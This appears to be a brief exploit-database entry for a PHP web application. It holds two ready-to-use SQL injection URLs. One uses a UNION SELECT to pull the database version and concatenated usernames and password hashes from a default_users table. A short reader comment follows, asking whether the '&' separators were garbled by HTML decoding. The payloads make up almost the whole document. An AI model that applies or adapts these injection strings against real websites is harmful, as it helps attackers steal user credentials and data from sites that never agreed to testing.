http://www.securityfocus.com/bid/31930/exploithttp://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL
SELECT 0,0,0,0,0,version()--
--
Just want to confirm, it appears the "&" is actually some HTML
decoding snafu that is essentially doing & and an encoded &? seems like
that should be "&nid=" in the first example and "&cpage" in the second?